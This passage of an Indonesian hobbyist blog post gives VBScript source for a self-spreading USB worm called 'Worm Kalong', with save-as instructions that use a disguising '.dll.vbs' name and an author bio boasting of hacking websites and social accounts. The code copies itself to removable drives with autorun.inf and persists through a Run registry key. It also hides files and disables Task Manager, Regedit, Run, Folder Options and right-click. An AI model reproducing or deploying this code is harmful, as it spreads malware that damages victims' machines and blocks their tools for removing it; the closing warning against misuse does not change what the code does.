set tf=fs.createtextfile(windowpath & "\batch- k4l0n6.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- k4l0n6.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\k4l0n6.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\k4l0n6.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
'//--Manipulasi Registry--//
set kalong = createobject("WScript.Shell")
'//--Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY--//
kalong.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," THE KALONG v.s. ZAY "
'//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"
'//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"
'//--Manip – Disable klik kanan--//
kalong.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
'//--Manip - Munculkan Pesan Setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe."
'//--Manip – Aktif setiap Windows Startup--//
kalong.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- k4l0n6.dll.vbs "
'//--Manip – Ubah RegisteredOwner dan Organization--//
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Kalong"
'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus CrACKER
sUmbER : CracKER
Salam Sukses, Mudah Mudahan Ilmu Gw Bermanfaat Bagi Semua Orang
KARYA CRACKER TKJ2 BEKASI
Penulliis
CraCkER SMK BEKASi
Lahir di ??, Kebon JERUK,
??, dari ??. Ketertarikan pada komputer
berawal dari SMK
Bekasi. Belajar komputer secara serius di SMK …?
Kebon Jeruk. Aktifitas sehari-hari sebagai CracKer. Tukang Bobol. Website , friendster , Facebook DLL Kebon.Jeruk Now di BEKASI
mengelola blog pribadi http://iwanjakarta.blogspot.com
CracKer BekAsI Email : Rahasia ( ?? )
Warning Ilmu Ini jangan Di Pakai Buat Kejahatan. Atau Ilmu Ini Di Ajarkan Ke Teman Kalian
Langganan:
Postingan (Atom)